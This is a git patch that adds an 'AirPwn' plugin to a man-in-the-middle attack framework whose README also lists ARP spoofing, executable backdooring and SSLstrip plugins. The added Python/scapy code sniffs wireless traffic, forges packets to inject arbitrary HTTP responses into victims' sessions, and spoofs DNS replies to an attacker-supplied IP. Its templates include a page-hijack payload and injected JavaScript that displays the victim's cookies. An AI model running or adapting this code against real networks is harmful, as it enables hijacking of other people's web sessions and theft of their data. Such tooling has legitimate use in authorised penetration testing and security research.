From 8ff9c246db4c63ac37f4455a5aab53237791405b Mon Sep 17 00:00:00 2001
From: byt3bl33d3r <byt3bl33d3r@gmail.com>
Date: Fri, 31 Oct 2014 00:46:43 +0100
Subject: [PATCH] added airpwn plugin

---
 README.md                                  |   3 +
 config_files/airpwn.cfg                    |   9 ++
 config_files/airpwn_templates/README       |   3 +
 config_files/airpwn_templates/airpwn_cssbg |  10 +++
 config_files/airpwn_templates/airpwned_png | Bin 0 -> 1116 bytes
 config_files/airpwn_templates/ftp_resp     |   2 +
 config_files/airpwn_templates/greet_html   |  11 +++
 config_files/airpwn_templates/js_html      |  13 +++
 config_files/airpwn_templates/puppy_jpg    | Bin 0 -> 3542 bytes
 config_files/airpwn_templates/site_hijack  |  15 ++++
 plugins/AirPwn.py                          |  95 +++++++++++++++++++++
 plugins/Spoof.py                           |   2 +-
 12 files changed, 162 insertions(+), 1 deletion(-)
 create mode 100644 config_files/airpwn.cfg
 create mode 100644 config_files/airpwn_templates/README
 create mode 100644 config_files/airpwn_templates/airpwn_cssbg
 create mode 100644 config_files/airpwn_templates/airpwned_png
 create mode 100644 config_files/airpwn_templates/ftp_resp
 create mode 100644 config_files/airpwn_templates/greet_html
 create mode 100644 config_files/airpwn_templates/js_html
 create mode 100644 config_files/airpwn_templates/puppy_jpg
 create mode 100644 config_files/airpwn_templates/site_hijack
 create mode 100644 plugins/AirPwn.py

diff --git a/README.md b/README.md
index 71f060f..67317dd 100644
--- a/README.md
+++ b/README.md
@@ -11,6 +11,7 @@ Availible plugins:
 - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
 - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
 - AppCachePoison - Perform app cache poison attacks 
+- AirPwn - Monitor traffic on an 802.11 network and respond with arbitrary content as configured
 - BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
 - CacheKill - Kills page caching by modifying headers
 - FilePwn - Backdoor executables being sent over http using bdfactory
@@ -25,6 +26,8 @@ So far the most significant changes have been:
 
 - Integrated SSLstrip+ (https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014 
 
+- Addition of the AirPwn plugin (Python port of the original project)
+
 - Spoof plugin now supports ICMP, ARP and DHCP spoofing along with DNS tampering
   (DNS tampering code was stolen from https://github.com/DanMcInerney/dnsspoof/)
 
diff --git a/config_files/airpwn.cfg b/config_files/airpwn.cfg
new file mode 100644
index 0000000..5a23602
--- /dev/null
+++ b/config_files/airpwn.cfg
@@ -0,0 +1,9 @@
+#Example config for the AirPwn plugin
+
+[site_hijack]
+match = ^(GET|POST).*
+response = ./config_files/airpwn_templates/site_hijack
+
+#[puppy_jpg]
+#match = ^GET [^ ]+\.(?i:jpg|jpeg|gif|png)
+#response = ./config_files/airpwn_templates/puppy_jpg
\ No newline at end of file
diff --git a/config_files/airpwn_templates/README b/config_files/airpwn_templates/README
new file mode 100644
index 0000000..9276f29
--- /dev/null
+++ b/config_files/airpwn_templates/README
@@ -0,0 +1,3 @@
+Sample content used by the configurations in the conf/ directory.  See
+the README there for more information.
+
diff --git a/config_files/airpwn_templates/airpwn_cssbg b/config_files/airpwn_templates/airpwn_cssbg
new file mode 100644
index 0000000..cf60a95
--- /dev/null
+++ b/config_files/airpwn_templates/airpwn_cssbg
@@ -0,0 +1,10 @@
+HTTP/1.1 200 OK
+Content-type: text/css
+Content-length: 103
+
+body {
+  background-color: red;
+  background-image: url(/airpwnbg.jpg);
+  background-repeat: repeat;
+}
+  
\ No newline at end of file
diff --git a/config_files/airpwn_templates/airpwned_png b/config_files/airpwn_templates/airpwned_png
new file mode 100644
index 0000000000000000000000000000000000000000..c4bd094eb64c7c05b0f675e9bc130d3ed7ca5e81
GIT binary patch
literal 1116
zcmV-i1f%;%R8&weF)lG6GB7Y8PfH3zZ*Fd7V{~b6ZaN@iY;SXA3PW#hbY*UIEp&Ns
zWjY{fZDD6+FK}*W3PW#hbY*UIEo^0OXLM*fATcmAHwp@gP)<h;3K|Lk000e1NJLTq
z009C3001Ni0{{R3RTISh00004XF*Lt007q5)K6G40000PbVXQnQ*UN;cVTj606}DL
zVr3vnZDD6+Qe|Oed2z{QJOBUy3{Xr|MgL4p|CyQp00960|GbVjRR913g-Jv~RCwCt
zn$eQ%AP7Xe_5c6**3KqTp%JFyKHWU+8Vm76TEs!0pZ4=~_i$?d{B0hRuKV&}bojhv
z_rqds!_|%A-Srw9mu8dPxbtJm`;M;>e5~#e%+vM=uKpg&gTOL-iD0z|Yga9U0)p8l
zw+_KkMibM#hYUW;YXsw?!7WIEyo8`JL2!8lM_CQayFZ&`@E*Z4AndRTxkF$UvROTp
z6S~{{+uJ2MMe6V35U_`jeNQgy4mSLhxded?SOzX%Htbv8!>TxV5a1jF6JD@uPc4HK
z!K&M`%YbA@`1$|Y073*pKVBf1cOh7-6oQx|SRy=LD6rNpXE0*lNWm1yXAz790B#!+
z{i_I=4GHm@iu_m<e8RJxMeuwRxOs|5C?H^p0D%~AkQZ@qjSXw^J%VQ$z!{Ciqky1i
z2p}>8N#5*evy>b|a5uyE^V(BD(9$k#RX7{<ix|)$uzB)dAwXAhb!JDH$T|eHjWAJV
z#O4fw+aq+Bx(AufyS!j&oZn+!d~{MU#$H3=6oNJo%(HZYxJN*?EITwafSRpobdIf|
zZ~_5V1Y47}GeR$)hfSzMHPVd@yLhrQ0>4AB^s<6jK>)@G2;q~P?Uc3azIGv<MX*Ys
zJ<JsluxIsxxz9RVr-3f2yyl)quzq)Uv`VW+z2^w1lD}!(F)O=2HlKnXM_@add^D6p
zBHkZ1Wu>(mAcc==?8&d=a)?41NZW&(o<cyiKiH^$!UIlQefn`6!LH_#Y>H?)liIj6
z&C*E_O&lnd;vb|&tn6};J<p(sz|Hoa)&{{i+Z;xKN-;3B*W@0$M{sEXRlG3_!YLF^
zpAn)|rkEWzwSnvr^f3`yg+M69Qz#rjfC&Lap$I`LqwGO#APE9IM_?BozJBC#ly<6K
zaF<M4R4zpEnAG-ZMJxs)f<BFm5nP@fsv7YZL006+5l~1+g5Wb-inJ0;5Devdg@AMI
z5b+HXi-%?8Cq*R&5X$;N(02%U1i^@O=r~vfk+qT#zCi$WZG+&zp|j6p_XykEiQiO>
z_T^K#a8!jZMbKX&;ClUqAPyEmtkw?k1p=yjGI7VO5OjfHli6@z;6UuJu6OS8jIi<+
znr}V(rGZ4i0|-U|3ZcJPZ$c|)j`jrtL>I;d1pPGvaPNrSHYx}vuWAU`lH1E20=`19
i9$eA?`{$nk0{{%gT8ZBLxt{<4002ovPDHLkV1f#EQRub+

literal 0
HcmV?d00001

diff --git a/config_files/airpwn_templates/ftp_resp b/config_files/airpwn_templates/ftp_resp
new file mode 100644
index 0000000..76bfaac
--- /dev/null
+++ b/config_files/airpwn_templates/ftp_resp
@@ -0,0 +1,2 @@
+331 FTP IS FUN!!!! ENJOY YOUR DATA!!!
+
diff --git a/config_files/airpwn_templates/greet_html b/config_files/airpwn_templates/greet_html
new file mode 100644
index 0000000..4091401
--- /dev/null
+++ b/config_files/airpwn_templates/greet_html
@@ -0,0 +1,11 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>HELLO DEFCON!</title>
+</head><body>
+<blink><font size=+5 color=red>
+Hello Defcon! Your wireless network is delicious!
+</font>
+</blink>
+<p>
diff --git a/config_files/airpwn_templates/js_html b/config_files/airpwn_templates/js_html
new file mode 100644
index 0000000..ffd9cb8
--- /dev/null
+++ b/config_files/airpwn_templates/js_html
@@ -0,0 +1,13 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>pwned</title>
+</head><body onLoad="
+alert('hi');
+alert('you');
+alert('are');
+alert('so');
+alert('owned');
+alert('cookie: ' + document.cookie);">
+
diff --git a/config_files/airpwn_templates/puppy_jpg b/config_files/airpwn_templates/puppy_jpg
new file mode 100644
index 0000000000000000000000000000000000000000..e84fc7e8b2efb21d0bb41965daea6d6a06cd832d
GIT binary patch
literal 3542
zcmb7@c{J3~`^P`C*w@Lv4ALn3&R9btBTJSESz<JnVGN<H$(}WYY{@QT->GCRYbhql
zkRtmQ*`xXCoZs*F{rmfV&b`k$_x(JtbDwkWHL$e2AtNU(CnPT`D`a||UYFqIg?09G
zCwQp|IeQX(vHwo|uwH&reu3UtH6eGrlPgvR=Z$s!f5Q{&<?83ACZwRKEJsgInWTIN
zSPk`2`Tz(70u0Uqp!@(h^#a^o0KnK75C;H&_H3PrLI!jJDhLz`g;1SsR8&;dG>o(~
zXJTPspksuwoI3|&fx*}~`MKEGc{yM(?(^KdaJZnLARCu3LRbL7FCZxJ4+1)CrJ<%_
zrln;TV27~_{MVv%0Wey?5paZngaI%N1c8AleE=K)z>u>k&gS@EQPV)FXu%KwM0aMZ
zvI1Zb`0V0P2n`hSuL1;yKw$vYx%1R)aym4^W=`@x;i>Ew3TZj6m}Ba@IT040?*7_7
zYvlt0;4}39Vb3y@>K~Sx=FGeZJ2OF0@P8^mU;qMxo;xo`#inB>{EzyJG6gW60l+W_
z4A24?pS%~%k4q(qO<3YFp4w()GAEGoX#&M99WkWK77W%A_#zm>Qs$&2&+A@{`J|Gj
z%6;qmG>0-=T4$?Hr7@luaL3Z{e$sUrDcYT9wnwN{WZQm!u9~u1xW9DITP1L}goDkK
z8}$qY0#UOCE4wY1+>*CTA&sUG8cucAR+`$-OP+MySxUCeNTnP)K$46jY1MZeW6+XY
zR5xs5F*lx{v}kEw<Hq6oZ)7qTt9y%_cxd-oS|r=JNUwQB9EU?~3%FL^TySk@*4VjL
zv-;Z?67Ezt84|7%mo|a=Gn&2-n;Ma6%SwiysyUCwD-h`ej76?)@pr+>$O#E#a&^5i
z3SZr<BcIpE42`ydt9?PFiAzV_OeqweuU)HCImxspI%BU2#%4X!CL65bA3HMDTUlja
z(8n^VM}#ESM*x3q`DFrTks}M0io4Tq%OKXImtNj$rt>w;J^9ca^QEH*sEaX&q^y(?
zT2@%JG3J7k*B5e)7|vItZP8IjNh4e@t2z!r@Cn9;Q2lxns);h>?Np4i;XO4iyRgl{
z-Zb`Cn$;pqE%|BpUO>h-^r-ABMgQa8!hxido_xB+(#(2ugDAssd(T_L+kAo^_g9h;
zMRFvgbUm-yJFp1l&7RYHe-G{N@T~t3<{x9XR%4azeWJvwsPynvQ}DZi&R#;)>9tka
zS5`%hM%tHz&9Lfh4+5TN1llW!C^Xx>Ko5$PNR(Q7aoYvu=O1#+U6zZLBXli%-!W@O
zslz`^jA@m#3tZf0cCyM-wmL6op-qJ8cfT$k3H3%wK93w4-XQ8a5sZ{R9)7CFx26TL
ziC00gEUxv7J-sREmiTGbcmNu*{muWGi;|0~m;^c_x$D+Gf**uBFRRZ(T|n3Grz9W8
z?#rXC;-&aGGVe-N$28u#&ym(OO3DOluUIvAY!sFIXDe1P%7L>};Me+5Vtvzfo|ASY
z*HO@J50_|sxl(03tU6q|)9H8rF3bMik_4IW;<)n!ajz0q{l(L;gAm-yE|p8!@_(#;
z+0kVN%*s^!xGeo#G$Li#fNz+O;W_4V0Q;zG=}3m7B7fTK+p?dxd28QoausomK3j3P
zqdZA2{qr}==<}T;yq|cW&xLipW512H=&4GNvUS=1P5DBH)rRtu?D07H_`Li=SN*y+
zp;|%>L&MSB9Ah{Rbh}S<VWhYbRDZmcKmpiQ%qtq=5OG{aS5|e_9ttvytYusFiwpJ|
zfDOYkYOz|uj;;O;g}D3zLndWja<N7r0j2Q>si|eBEb6|JYzr6uQai^h6lhX5)w3x>
zuK2@JV0`(e%N#ZWd;Xm508RbMUiZG+0FII5$A!JtY0CuwQft1)KTNZm&SfP3d5G&w
z{&WC&Z8>0$6M2sjDT&dpn&2yDb2NRSwZwlXkIyvA`?%MJ?V6QzworOxL&}6eX4~va
zq}@&wx|_Cww8C`N!Vt{R91bOraL6M}2ti{H^>;{2_~wKszU-S5CMcZXaOjY4*f(B{
z3#9qW8s_pTT;YHX>#wS(Q&xdynXJ`)bVO~B&be7CC5fHRpQ&5ec8)<j@7?;g0xv1g
zQeYsIm)m#fbLDZNO;bL;&w9^>vYh)Q^^(ObxhP5ZO_oivk$4J!;vUnXZ!85EKWWDi
z&6U+t-%tRFdD8%<cZ%A2Pf_X;bsA4yUJi8N!|a@<$?+0vOYS1inj-ymS|<)&4{!G+
znMvF8`?{y8QXRDP`aUEW>oH1iZ6Zr6I*fH6S5#}*M;MJt*TnJ7$Ind;<)P6w*9=5_
z5q6a{^dVE>E9-<7Wh6_NN@NVCLT<`2=8`#KVYz(6)0G17glN@1v^2iTP*!9}#^@+R
zTFrLfNKTANiMeRC!#Sck*5D`F%slgx#l`3m_n$$k{8zf7?s;tdnnk~InAt{Ud7pA1
zdC|ie+~cCeXxGag?(NO}g<OI)ny-=HkK<34HPS~-d6A2m$bGWY!9nl!zQi=zyFu=b
z1{q>i^hHUe4a|dn5bj&`W%Jt9QBqP5S=6<$p2RfRkmXdHQ8}d8JCD_Z-JWy!dA}cR
z*(hzx&u&iaH%xN9iF9>t3=Iy6xs1!kW=*8^Jt<vp{p8Qv!nfa7^`b-HRKpW3AoLCa
zxf>M$I+BHlW!J?FI}9URR}l?!>jwF|@^3ZOyN>R1B)v`w)!PJ#(rta5Z8e#PFW3Yx
z+RW>wo0HJL!|_f7QrH#ekEivn8NWIn1lpTIsW9IARxGdG@V;KLoolhN%)j<+dINpm
zK7Cgfh|IZLpqLo+9RJ7Z>ErFB3clRvl#1*3IbH{*A?!f589SR4ASyU~vC%reV;!G(
zAnBt>%?TSQyfXRN)8jIt>{iALa~Xf3V0>cpJ4J;%fhP$=9qeOpCVa-L3JSm-=5K2$
z9-_~CpP~Dqf3`wXl~|mp>2<&EOEDx0@XGgvYpCA5cNebZut^xA_ud%F8kAr?H`~1)
zU#vdI!x+@m*VU3=vd?+!zp>Y6zTbwAI!<eRrC@$2lCL2o+3?EZ1DL4N$lO96_Z=rQ
zjvT~_HTvI4ZJN#mf8h(K0M_V_UD<FY-g@wruE3<-lMnRrk6}CQjkq9pqE#N-^`n!5
z$iLo!I<4*z1oc)));R|l1u$`09@H($v~c_m){O2q$)eg8PhD#y8j8-`xVyLW_3<KP
zVU@)b$Ga@15_{2YM!Nc?zyX|Dp*;SEhH86>^%%2BZL%?!P|U^Cm>IeEfyP{w(y@^Y
zB;4ssOwzQ?PtqVOF`3w)Ld?`oX(DRhvmaF7n#2jbncORk&@WPWtrcAr9d9(dLv8Vq
z`Pg`4BUwRg9@k%*LpybkbK*)G=pLfx3v^{w(`Sag&SFd#Wg!=jO+8Wwx#fwpSd}CP
z-Nx4??w$6v&#50mqJIv$ITQ2s(_9n9C1iRek*Bg2R-y)9)j<hr)x2SKT@!eunDx~B
z(qrwK(o*n??^n=Q66w(Pn7$_-Km7acv^dP$(sFp5pSrU@{<0_=YH!6i&LJd`)Vl1g
zrH(3}m%nymc)vv=gs1J%2YIeylpE$!dV<eA!Gj1Esv}D!|7lVNDH?KpnR-S?_)uz2
zBj(nzm7-im_NHIa^m9-8pO&9hMF`&;d99)!Az~$YPDfjyRY4nzZ0j=)jDOxaXg-y$
zC@n3>Dlxu?m3(WN5VY5`nUI7H`7FLP!gwoxbD6GgD`A!`AY_S|-hflv>tO=e)OlY8
z7&`Qo9sa#6lrEfd_5}Ig(k#p}9x%GFJV9Em5BFPa-!w@@A$DlJh-2r?2Pgk#@t?jB
ziFh98&LL=&)_1)EuGgQt(rI@)fQ9u(GSgBsqLkgkeJI+!Wiot{5Ot8ivvHrzM|aVi
zM>u+6iY{eY0@D#Jx35{3J2(}Q6#H|)A&grN7U;2p&AnP~_Go|`zxcVcordtVMZ=fQ
zLELSLWZ19NwQ3+Pb(|2|AvYs!Wd<$$fub)sSti-NTvy)RB4nzTq^Y{5J<ePHLQ^`L
z5nW3#-X8H<+5`8>_}(@a@@cNu$<_Jb{AR{PWYm(K0+@ze&2e!1=t;Lqtx3}s!ZlK1
zx87TNuvg!ouE_ei=qr6a)G^cW#!%n!9D?=kS5LoZda*5sFG?om?^7+H7~j``6kB#?
zgIV&WR4Su(s&>b7rm&wGaMa&nXW#DIxtfx)PAydGhg@<QeZ>yZ#o5YaaclANA$N^Y
z9p-#nZO>9m>9jf<zsELc?4Ylc<+Z@z%5U0AT*J?_3O@5Vz8mdpVQ&O#)AbN*8c~f8
z@An6W@{SvAts1{s;%1GMjXr#IoB!|$azG?jwDel(qtw7+4<@+OX<c5GaL`wYn?*`F
zmdrKQxuVJ*3CDJ}6rj!L!MJedt#`vEq%qcu)?dA<l-r@KI-L8*KUgww)x!v`aweEq
z@FejSbIC4pYy83C;z`+-52!7?T~&U2$<UuIMpSX8Pdif`VA}G^B92s=*ygCcRMLGJ
z3BRhlGeiN*R&9MkV@<Mh?HP0~{dqx7Nw4JL`s`DTk!l{ky~-@%ezRf)uDWdij>C{j
Z1bTy$_7R~SvJHtG!-ii6?Mx|O{|DgBNO%AM

literal 0
HcmV?d00001

diff --git a/config_files/airpwn_templates/site_hijack b/config_files/airpwn_templates/site_hijack
new file mode 100644
index 0000000..3e5f6ff
--- /dev/null
+++ b/config_files/airpwn_templates/site_hijack
@@ -0,0 +1,15 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+Content-Length: 250
+
+<html>
+  <head><title>hugs</title></head>
+  <body>
+    <iframe frameborder=0 border=0 src="http://google.com" width="100%"
+      height="100%">hugs</iframe>
+    <div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
+      BYE BYE!
+
+
+<!--
diff --git a/plugins/AirPwn.py b/plugins/AirPwn.py
new file mode 100644
index 0000000..89b214d
--- /dev/null
+++ b/plugins/AirPwn.py
@@ -0,0 +1,95 @@
+# Some of this code was stolen from https://jordan-wright.github.io/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/
+
+from plugins.plugin import Plugin
+import threading
+import logging
+import sys
+import re
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import *
+
+try:
+    from configobj import ConfigObj
+except:
+    sys.exit('[-] configobj library not installed!')
+
+class AirPwn(Plugin):
+	name = 'Airpwn'
+	optname = 'airpwn'
+	desc = 'Monitor traffic on an 802.11 network and respond with arbitrary content as configured'
+	has_opts = True
+
+	def initialize(self, options):
+		self.options = options
+		self.mon_interface = options.mon_interface
+		self.aircfg = options.aircfg
+		self.dnspwn = options.dnspwn
+
+		if os.geteuid() != 0:
+			sys.exit("[-] AirPwn plugin requires root privileges")
+
+		try:
+			self.aircfg= ConfigObj(self.aircfg)
+		except:
+			sys.exit("[-] Error parsing airpwn config file")
+
+		t = threading.Thread(name='sniff_http_thread', target=self.sniff_http, args=(self.mon_interface,))
+		t.setDaemon(True)
+		t.start()
+
+		if self.dnspwn:
+			t2 = threading.Thread(name='sniff_dns_thread', target=self.sniff_dns, args=(self.mon_interface,))
+			t2.setDaemon(True)
+			t2.start()
+
+	def sniff_http(self, iface):
+		sniff(filter="tcp and port 80", prn=self.http_callback, iface=iface)
+
+	def sniff_dns(self, iface):
+		sniff(filter="udp and port 53", prn=self.dns_callback, iface=iface)
+
+	def http_callback(self, packet):
+		if packet.haslayer(TCP) and packet.haslayer(Raw):
+			for rule in self.aircfg.items():
+				if (re.match(r'%s' % rule[1]['match'], packet[Raw].load)):
+					response = packet.copy()
+					# We need to start by changing our response to be "from-ds", or from the access point.
+					response.FCfield = 2L
+					# Switch the MAC addresses
+					response.addr1, response.addr2 = packet.addr2, packet.addr1
+					# Switch the IP addresses
+					response.src, response.dst = packet.dst, packet.src
+					# Switch the ports
+					response.sport, response.dport = packet.dport, packet.sport
+					response[Raw].load = open(rule[1]['response'], 'r').read()
+
+					sendp(response, iface=self.mon_interface, verbose=False)
+					logging.info("%s >> Replaced content" % response.src)
+
+	def dns_callback(self, packet):
+		if packet.haslayer(UDP) and packet.haslayer(DNS):
+			req_domain = packet[DNS].qd.qname
+			response = packet.copy()
+			response.FCfield = 2L
+			response.addr1, response.addr2 = packet.addr2, packet.addr1
+			response.src, response.dst = packet.dst, packet.src
+			response.sport, response.dport = packet.dport, packet.sport
+			# Set the DNS flags
+			response[DNS].qr = 1L
+			response[DNS].ra = 1L
+			response[DNS].ancount = 1
+			response[DNS].an = DNSRR(
+				rrname = req_domain,
+				type = 'A',
+				rclass = 'IN',
+				ttl = 900,
+				rdata = self.dnspwn
+			)
+
+			sendp(response, iface=self.mon_interface, verbose=False)
+			logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
+
+	def add_options(self, options):
+		options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
+		options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
+		options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')
diff --git a/plugins/Spoof.py b/plugins/Spoof.py
index 677ce25..5aa52a9 100644
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@@ -304,7 +304,7 @@ class Spoof(Plugin):
     def logPrefix(self):
         return 'queue'
 
-    def add_options(self,options):
+    def add_options(self, options):
         group = options.add_mutually_exclusive_group(required=False)
         group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
         group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')